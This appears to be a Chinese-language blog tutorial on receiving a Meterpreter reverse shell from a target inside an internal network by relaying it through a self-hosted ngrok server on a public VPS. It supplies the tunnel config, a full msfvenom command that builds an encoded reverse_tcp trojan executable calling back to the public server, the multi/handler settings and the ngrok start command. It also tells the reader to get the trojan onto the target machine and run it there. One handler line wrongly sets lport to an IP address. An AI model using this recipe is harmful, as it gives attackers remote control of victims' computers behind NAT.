通过ngrok在内网捕获meterpreter反弹

一、准备工作
在学习msf的过程中，一般都是搭建虚拟机，在局域网里进行练习的。在实际渗透中，目标机器与我们的主机可能并不在同一个网络内，甚至会有双方都处在内网中的情况。那么，如何让处在内网中的目标机器把 meterpreter shell 反弹到同样在内网中的主机呢？

首先需要一台有公网ip的服务器，用作中转。然后在服务器上部署ngrok服务，并生成linux平台的客户端程序。我选择的是自己搭建ngrok服务器，版本是1.7，可以在https://github.com/inconshreveable/ngrok找到源码。网上有很多部署ngrok的教程，我自己也做了一篇笔记https://blog.csdn.net/Kwansy/article/details/82186780，仅供参考。另外推荐使用2.x版本的ngrok，据说是更加稳定快速的版本（配置方面就得根据新版本来了，配置文件格式也是不一样的。）

把编译好的客户端ngrok下载到Kali上，同目录下创建配置文件，配置文件这样写

server_addr: "公网服务器的域名:4443"
trust_host_root_certs: false
tunnels:
  msf:
    proto:
      tcp: 8868
    remote_port: 8848

一定要注意，不能用tab键，全部用空格敲出来，并且缩进要严格按照规范来，多一个少一个空格都运行不起来。
配置文件自定义了一个隧道叫msf，这个可以自己改，意思就是在VPS上侦听8848端口，然后转发到本地8868端口。这里可以先运行一下，看看有没有问题。在命令行中这样写

如果前面都没有出错，正常运行是这样的

如果没问题，就先退出掉ngrok，现在不需要运行它。

二、使用msfvenom生成木马
这一步比较简单，生成一个反弹木马，也可以用shellcode自己编程，也可以在msf里面generate生成，这个看您心情。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00\xff' lhost=公网服务器的IP lport=8848 -f exe > /root/a.exe

端口8848是木马反弹到公网服务器的端口，我取这个是为了致敬8848钛金手机。

下一步是把木马发到目标机器上运行，这一步非常关键。

三、在MSF中接收反弹
具体的命令我就不贴了，总之是选择exploit/multi/hander模块，设置payload为windows...meterpreter...reverse_tcp
然后设置 lhost lport

set lport 127.0.0.1
set lport 8868

run

四、启动ngrok

输入第一步那条命令来启动ngrok

./ngrok_for_linux -config=ngrok.cfg start msf

这样木马就连接到公网服务器的8848端口，然后通过ngrok转发到本地的8868端口，被MSF接收到。

注意，一定要在MSF先run了再运行ngrok，顺序不能错。